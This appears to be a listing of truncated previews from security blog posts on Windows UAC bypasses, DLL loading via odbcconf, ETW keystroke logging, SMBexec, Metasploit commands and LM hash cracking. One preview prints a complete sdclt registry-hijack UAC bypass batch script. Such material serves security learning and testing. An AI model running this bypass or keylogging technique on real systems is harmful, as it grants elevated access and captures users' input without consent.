作者:嘶吼吼链接:https://zhuanlan.zhihu.com/p/23473665来源:知乎著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出处. About: Use odbcconf to load dll Use powershell to get dll exports Use Event Tracing for Windows to log keystrokes from USB keyboards 目录: 1. 介绍为什么通过odbcconf加载dll可以绕过…
Windows 10 sdclt UAC bypass @echo off reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /t REG_SZ /d %COMSPEC% /f sdclt reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f…
备战一个月比赛,导致近期都没啥时间更新博客,正好今天看到一篇通过调用本地RPC服务的文章,觉得非常有意思,就拿来充充博客. 在1.0版本的APPINFO.DLL中的RPC服务调用接口ID为:201ef99a-7fa0-444c-9399-19ba84f12a1a 用RAiLaunchAdminProcess函数调用本地RPC [ uuid (201ef99a-7fa0-444c--19ba84f12a1a), version(1.0), ] long RAiLaunchAdminProcess(…
首页 新随笔 订阅 管理 随笔 - 7  文章 - 0  评论 - 0 UAC 实现原理及绕过方法   目录 0x01 UAC 实现方法(用户登陆过程)0x02 UAC 架构0x03 触发UAC0x04 UAC 虚拟化0x05 UAC 逆向分析1x01 无文件白名单提权机制1x02 DLL 文件注入提权1x03 0day [TOC] 0x00 UAC 工作流程 UAC 是微软在 Windows Vista 以后版本引入的一种安全机制, 通过 UAC,应用程序和任务可始终在非管理员帐户的安全上下文…
目录 0x00 UAC 工作流程 0x01 UAC 实现方法(用户登陆过程) 0x02 UAC 架构 0x03 触发UAC 0x04 UAC 虚拟化 0x05 UAC 逆向分析 1x00 UAC Bypass 1x01 无文件白名单提权机制 1x02 DLL 文件注入提权 参考资料: 0x00 UAC 工作流程 UAC 是微软在 Windows Vista 以后版本引入的一种安全机制, 通过 UAC,应用程序和任务可始终在非管理员帐户的安全上下文中运行,除非管理员特别授予管理员级别的系统访问权限…
The steps are pretty straight forward. The only tool that might cause some confusion is SMBexec. This requires you to interact 3 times with a different option every time. So here's the options you need to use, in the correct order Select option 1 (Wh…
目录一.名词解释···································································· 3二.msf基础··································································· 3三.信息探测与收集··························································· 4四.基本漏洞扫描··················…
metasploit 常用命令备忘    MSFconsole Commands-------------------------------------24show exploits 查看所有exploitshow payloads 查看所有payloadshow auxiliary 查看所有auxiliarysearch name 搜索exploit 等info 查看加载模块的信息use name 加载模块LHOST 本机IPRHOST 目标IPset function 设置选项值setg…
一.名词解释 exploit 测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果.常见的 有内存溢出,网站程序漏洞利用,配置错误exploit. payload 我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立一 个反响连接,bind shell 绑定一个执行命令的通道至测试者的机器.payload 也可以是只 能在目标机器上执行有限命令的程序. shellcode 是进行攻击时的一系列被当作payload 的指令,通常在目标机器上执行…
LM(LAN Manager)Hash是Windows操作系统最早使用的密码哈希算法之一.在Windows 2000.XP.Vista和Windows 7中使用了更先进的NTLMv2之前,这是唯一可用的版本.这些新的操作系统虽然可以支持使用LM哈希,但主要是为了提供向后兼容性.不过在Windows Vista和Windows 7中,该算法默认是被禁用的.本节将介绍如何破解LM Hashes密码. 在Kali Linux中,可以使用findmyhash工具破解LM Hashes密码.其中,find…